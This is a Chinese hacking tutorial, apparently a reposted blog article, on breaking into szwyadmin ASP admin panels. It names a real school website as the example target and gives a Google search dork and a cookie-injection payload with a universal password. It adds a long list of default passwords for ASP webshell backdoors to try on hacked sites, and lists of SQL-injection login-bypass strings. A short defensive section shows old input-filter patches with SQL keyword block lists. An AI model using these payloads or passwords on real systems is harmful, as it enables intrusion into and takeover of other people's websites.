你的漏洞真的补了?万能再袭

先声明:拿站凭良心,不要瞎搞,逆天只是讲解一个技术,你们要是瞎搞,自己负责,与我无关!

补漏洞的时候记得两点:1.你所信任的是否安全;2.能否举一反三

看正文:(szwyadmin漏洞:利用cookies和万能密码实现入侵)

谷歌:inurl:szwyadmin/login.asp

比如我在搜索的网站中选了这个网站

http://www.jsxzxy.com/szwyadmin/login.asp

入侵代码:(复制,放到地址栏里面,会弹2个警告框,点确定就ok了)

javascript:alert(document.cookie="adminuser="+escape("‘or‘=‘or‘"));javascript:alert(document.cookie="adminpass="+escape("‘or‘=‘or‘"))

替换代码:

代码2:admin_index.asp

现在网站变成了http://www.jsxzxy.com/szwyadmin/admin_index.asp

这样我们就可以进去了      入侵网站就是这样,

其实这个就是运用了万能密码和cookies相结合的一个应用,其本质就是万能密码过滤不到位导致的!

看图实战:
 

——————————懒人直接绕过,下面是讲解,上面利用的部分已经讲完了——————————

【逆天讲解:】

JavaScript escape() 函数 【这里用这个函数来骗网站的验证】

定义和用法

escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串。

语法

escape(string)

参数描述

string必需。要被转义或编码的字符串。

返回值

已编码的 string 的副本。其中某些字符被替换成了十六进制的转义序列。

说明

该方法不会对 ASCII 字母和数字进行编码,也不会对下面这些 ASCII 标点符号进行编码: * @ - _ + . / 。其他所有的字符都会被转义序列替换。

提示和注释

提示:可以使用 unescape() 对 escape() 编码的字符串进行解码。

注释:ECMAScript v3 反对使用该方法,应用使用 decodeURI() 和 decodeURIComponent() 替代它。

实例

在本例中,我们将使用 escape() 来编码字符串:

<script type="text/javascript">

document.write(escape("Visit W3School!") + "<br />")

document.write(escape("?!=()#%&"))

</script>

输出:【是不是有效的骗过了我们的眼睛?】

Visit%20W3School%21

%3F%21%3D%28%29%23%25%26

【追述本源】

修补也就是重新过滤一下万能密码,不能总是只针对对 ‘ 来修补漏洞,要对or之类的关键词也有限定(逆天建议)

以前的修补方法:

方法1: Replace过滤字符 【一骗就过去了。。。】

  解决方法:查找login.asp下的

  username=request.Form("name")

  pass=request.Form("pass")

  修改为:

  username=Replace(request.Form("name"), "‘", "‘‘")

  pass=Replace(request.Form("pass"), "‘", "‘‘")

  语法是屏蔽‘和‘‘字符来达到效果.

方法2:在conn.asp 内加入

注前提 登陆页面有)

把以下代码保存为safe.asp

程序代码【没把or也加进去】

<%

Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name

Err_Message = 3

Err_Web = “safe.htm”

’出错时转向的页面

Query_Badword=”’|and|select|update|chr|delete|%20from|;|insert|mid|master.|set|chr(37)|=”

’在这部份定义get非法参数,使用”|”号间隔

Form_Badword=”’|(|)|;|=”

’在这部份定义post非法参数,使用”|”号间隔

On Error Resume Next

if request.QueryString”" then

Chk_badword=split(Query_Badword,”|”)

FOR EACH Query_Name IN Request.QueryString

for i=0 to ubound(Chk_badword)

If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))0 Then

Select Case Err_Message

Case “1″

Response.Write “alert(’传参错误!参数 “&name&” 的值中包含非法字符串!\n\n请不要在参数中出现:and update delete ; insert mid master 等非法字符!’);window.close();”

Case “2″

Response.Write “location.href=’”&Err_Web&”’”

Case “3″

Response.Write “alert(’传参错误!参数 “&name&”的值中包含非法字符串!\n\n请不要在参数中出现:and update delete ; insert mid master 等非法字

符!’);location.href=’”&Err_Web&”’;”

End Select

Response.End

End If

NEXT

NEXT

End if

if request.form”" then

Chk_badword=split(Form_Badword,”|”)

FOR EACH name IN Request.Form

for i=0 to ubound(Chk_badword)

If Instr(LCase(request.form(name)),Chk_badword(i))0 Then

Select Case Err_Message

Case “1″

Response.Write “alert(’出错了!表单 “&name&” 的值中包含非法字符串!\n\n你的非法操作已记录,请马上停止非法行为!’);window.close();”

Case “2″

Response.Write “location.href=’”&Err_Web&”’”

Case “3″

Response.Write “alert(’出错了!参数 “&name&”的值中包含非法字符串!\n\谢谢您光临!,请停止非法行为!’);location.href=’”&Err_Web&”’;”

End Select

Response.End

End If

NEXT

NEXT

end if

%>

【拓展:国内流行的asp大马后门的万能密码和以前的万能密码】

这些大马基本就是国内流行的asp木马,如果你日站捡到这些大马,可以用这些密码试试,有的是搜集的万能密码,有的是默认密码

还有哪个黑阔搜集的有发来给我,我全部贴出来给大家

正文:

黑羽基地免杀asp大马 密码5201314

Asp站长助手6.0 密码584521

web综合安全评测 – Beta3 密码nohack

未知数X 密码45189946

baidu}” 密码baidu

路遥知马力 密码123

黑客网站之家 美化版 密码chenxue

Thé、End.゛ 密码and QQ:913720787

笑佛天下 密码cnot

西域小刚-站长助手-修改版本 密码xxoxx

XXXXX 密码rinima

暗组超强功能修正去后门加强S-U提权版 密码hkk007

黑客官方-长期提供网站**,密码破解 数据库** 密码chengnuo

ASPAdmin_A 密码”5556661221″ ’123456

火狐ASP木马(超强版)” 密码wrsk

雨夜孤魂 密码54321

Dark Security Team 密码yuemo

随风自由的泪 密码jcksyes

伟大的农民 密码521

mr.con asp小马 密码*******

JspX 密码4lert

围剿专版 密码yuemo

maek dream 密码hacker

Shell 密码xxxxx

靈魂◆安全小组+” 密码10011C120105101

银河安全网 密码fclshark

ASPXSpy 密码19880118

Dark 密码376186027

No Backdoor Webshell(刀) 密码admin

黑勇士shell勇士版 密码654321

小武来了 密码535039

Evil sadness 密码admin

F.S.T 联盟交流群内部版!!!别外传噢 密码000

独自等待专用 密码123

windows 密码 123

[D.s.T]会员专用WebShell 密码darkst

我要进去’ 密码jcksyes

Hacker’Rose 密码123456

随风自由的泪 密码jcksyes

F.S.T 海盗内部版.!别外传噢。by 海盗 密码 jinjin

WebShell 6.0 VIP(密码防破解版 密码 12345

JFeng 密码sq19880602

Evil sadness 密码 jtk2352

路遥知马力 密码sq19880602

奥运专版网站维护工具(加强版)” 密码 kill

Edu黑客官方 密码chengnuo

未知数X 密码45189946

心动吧ASP超级提权修正加强版20080124 密码123321

2010贺岁版 免杀 WebShell 密码admin

Michael、T 专用asp提权木马 密码hacker

Evil sadness 密码admin

邪恶的装逼大叔冰菊 密码admin

【HACKYONG】最终版 密码haode

芝麻开门 密码chuang

aiezu 密码981246

萧萧文件管理 密码et520

Password: 密码

winner

冷血 密码12

奥运专版网站维护工具(加强版 密码20080808

by:空气 密码yrpx

暗组超强功能修正去后门加强S-U提权版 密码hkk007

火狐ASP木马(超强版)” 华夏五周年庆典版 密码wrsk

(中国数据) 密码rinima

asp 黑客→kissy 密码ceshi2009

Evil sadness 密码5201314

F.S.T 联盟交流群内部版.!别外传噢 密码rfkl

username 密码847381979

这是一个没有信仰的年代 密码

jing

伟 密码winner

沙漠之烟 密码4816535

去演绎神话吧’ 密码zhack

Sam,asp大马修正加强版 QQ:42466841 密码mama520

fuck you 密码123go

小武来了 密码1

Baiki-” 密码1

Login 密码888999

E.V.A.V 专 用 网 马『修改版』密码13572468

月满西楼 密码sasa

蛋蛋WEBSHELL鼠年增强版 密码dangdang

乄缘來④妳专版免杀asp大马 密码lovehack7758

F.S.T 联盟交流群内部版.!别外传噢 密码rfkl

暗组超强功能修正去后门加强S-U提权版 密码123

80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp hkmm

G.xp 专用 密码133135136

Satan 密码1992724

F.S.T 联盟交流群内部版!!!别外传噢!!! 密码yong

Evil sadness 密码noid

懂你味道 密码caodan

黑鹰专用WEBSHELL 密码96315001

思易免杀ASP木马3.0(最新两款) 密码admin

TX-网络专用ASP木马 密码axiao

username 密码847381979

F.S.T 联盟交流群内部版.!别外传噢。” 密码rfkl

GHOST永久免杀ASP木马 ghost 密码yuemo

围剿专版 +口令 密码yuemo

Miracle个人专用 密码12

小武来了 密码535039

唐宋元明清╯” 密码bzxyd

安全检测 {BY:網丄邻居} |” 密码tonecan

我要进去’ 密码bzxyd

Evil sadness 密码5201314

3E Security Team 密码3est

败家简单前后门 密码sin

F.S.T 海盗内部版.!别外传噢。by 海盗 密码654321

蓝色灭杀 密码ghost

HqzX 密码C

F.S.T 联盟交流群内部版!!!别外传噢!!!” 密码yong

webadmin2 密码webadmin

HqzX’s Blog 密码

login蓝色 密码5909062xzx

红盟太子 iolhcw19891209

岁月联盟 (?Copyright (C) 2004 Security Angel Team [SYUE] All Rights Reserved.) 密码 hehe

一、asp aspx万能密码

1:"or "a"="a

2: ‘)or(‘a‘=‘a

3:or 1=1–

4:‘or 1=1–

5:a‘or‘ 1=1–

6:"or 1=1–

7:‘or‘a‘=‘a

8:"or"="a‘=‘a

9:‘or‘‘=‘

10:‘or‘=‘or‘

11: 1 or ‘1‘=‘1‘=1

12: 1 or ‘1‘=‘1‘ or 1=1

13:‘or 1=1 or ‘1‘=‘1

14: ‘OR 1=1%00

15: "or 1=1%00

16: ‘xor

17: 用户名 ‘ UNION Select 1,1,1 FROM admin Where ‘‘=‘ (替换表名admin)

密码 1

18:1′or’1′=’1

19:admin’or’1′=’1′–

20:or 1=1– ‘

21:” or “a”=”a

22:‘or’ ’1′=’1

23:admin‘ or ‘a‘=‘a 密码随便

24: "or 1=1%00

25: ‘OR 1=1%00

最短的:’or’1

二、PHP万能密码

‘or 1=1/*

User: something

Pass: ‘ OR ‘1‘=‘1

三、jsp 万能密码

1‘or‘1‘=‘1

admin‘ OR 1=1/*

你的漏洞真的补了?万能再袭,布布扣,bubuko.com

时间: 2024-10-11 13:10:11

你的漏洞真的补了?万能再袭的相关文章

心血漏洞第二发?SSL v3再曝新漏洞发布预警

关于前一阵的SSL"心血"漏洞我想大家一定不会太陌生,漏洞出来之后,各家都组织人马忙东忙西.该分析的分析,该打补丁的打补丁.可悲的的是尽管补了却还是可以绕过弄得大家精疲力竭.可悲的的是尽管补了却还是可以绕过弄得大家精疲力竭. 但风波刚刚过去,我们的厂商还没来得及松口气,今天又收到了另外一则可怕的消息:"Heartbleed"又来了!不过这次,是SSL3.0版本. 根据路边社消息,99.6433%的前1000000站点均支持SSL v3.这下,真的有意思了. 来看一下

BASH漏洞需要补

一.使用 yum-downloadonly 插件 yum install yum-downloadonly -y 二. yum update bash --downloadonly --downloaddir=/var    #就会自动把对应系统的 bash 版本下载到目录 /var 下. ll /var/bash-4.1.2-15.el6_5.1.x86_64.rpm scp bash-4.1.2-15.el6_5.1.x86_64.rpm 到版本一样的其他机器上去 三.在其他机器上去安装新版

跟遗留代码打交道:干掉顽固漏洞的简单方式

事实证明,跟遗留代码打交道未必需要花费数天时间去研究晦涩难懂的注释.要想找到并修复漏洞,开发者可采用简单的测试工具来对问题抽丝剥茧. 跟遗留代码打交道会是比较困难的,尤其是如果代码是由某位不知道名字的程序员用一种不熟悉的语言编写的话.但跟据Mob Programming 的R Jason Kerney 和Llewellyn Falco的说法,遗留应用中的bug是可以相对迅速地发现和修补好的,这个过程只需要若干相当直截了当的技巧. "我通常是没有机会去理解(遗留)代码的,所以我必须想出办法在不理解

互联网安全锁现大漏洞 网友建议:不要登录一切网银电商网站

2014.04.11 22:19:51 来源:南方日报作者:南方日报 ( 2 条评论 )  http://www.techweb.com.cn/internet/2014-04-11/2027049.shtml 昨日,被称为"心脏出血"的OpenSSL协议安全漏洞引发了人们对网上支付的担忧.传言称,这个漏洞"波及几乎所有网站",用户"不登录还好,一登录网站就有可能导致用户名和密码失窃".截至昨日18时12分,百度搜索关键词"OpenSS

Vim自动补全神器:YouCompleteMe(转)

转自:http://blog.jobbole.com/58978/ 可能会有一段时间写linxu,免不了用vim,留着,找时间实操之 原文出处: marchtea 的博客 第一次听说这个插件还是在偶然的情况下看到别人的博客,听说了这个插件的大名.本来打算在实训期间来完成安装的,无奈网实在不给力,也就拖到了回家的时候.在开始准备工作的时候就了解到这个插件不是很容易安装,安装的时候果然名不虚传.(关于这方面的内容,请查看另一篇文章)不过,有付出总有回报,安装之后用上这个插件,真心为这个插件的强大所折

Vim自动补全神器:YouCompleteMe

第一次听说这个插件还是在偶然的情况下看到别人的博客,听说了这个插件的大名.本来打算在实训期间来完成安装的,无奈网实在不给力,也就拖到了回家的时候.在开始准备工作的时候就了解到这个插件不是很容易安装,安装的时候果然名不虚传.(关于这方面的内容,请查看另一篇文章)不过,有付出总有回报,安装之后用上这个插件,真心为这个插件的强大所折服. 那这个插件有何不同? YouCompleteMe的特别之处 基于语义补全 总所周知,Vim是一款文本编辑器.也就是说,其最基础的工作就是编辑文本,而不管该文本的内容是

2018-2019-2 网络对抗技术 20165206 Exp6 信息搜集与漏洞扫描

- 2018-2019-2 网络对抗技术 20165206 Exp6 信息搜集与漏洞扫描 - 实验任务 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点(以自己主机为目标) (4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞(以自己主机为目标) - 基础问题回答 (1)哪些组织负责DNS,IP的管理. 全球根服务器由美国政府授权的ICANN统一管理,负责全球的域名根服务器.DNS和IP地址管理. 全球共

较有意思的Apple XSS(CVE-2016-7762)漏洞

文章作者:Avfisher0x00 前言应CVE作者的要求帮忙分析一下这个漏洞,实际上这是一个思路比较有意思的Apple XSS(CVE-2016-7762).漏洞作者确实脑洞比较大也善于尝试和发掘,这里必须赞一个!0x01 分析与利用官方在2017年1月24日发布的安全公告中如下描述: 可利用设备:iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later 漏洞影响:处理恶意构造的

利用win7操作系统粘滞键漏洞更改Windows管理员密码

本次教程主要介绍如何利用Windows系统的粘滞键漏洞实现替换CMD命令提示符再利用net命令更改Windows密码.首先当我们拿到一台计算机时,我们肯定需要去获得这台电脑的管理员权限.找到计算机图标右键管理打开,找到本地用户和组,双击里面的用户按钮,如图: 展开用户之后,会看到右侧"Administrator"用户下方有一个黑色向下的小箭头,该箭头表示账户已禁用.我们现在需要启用该账户,所以双击"Administrator"账户弹出属性对话框,将"账户已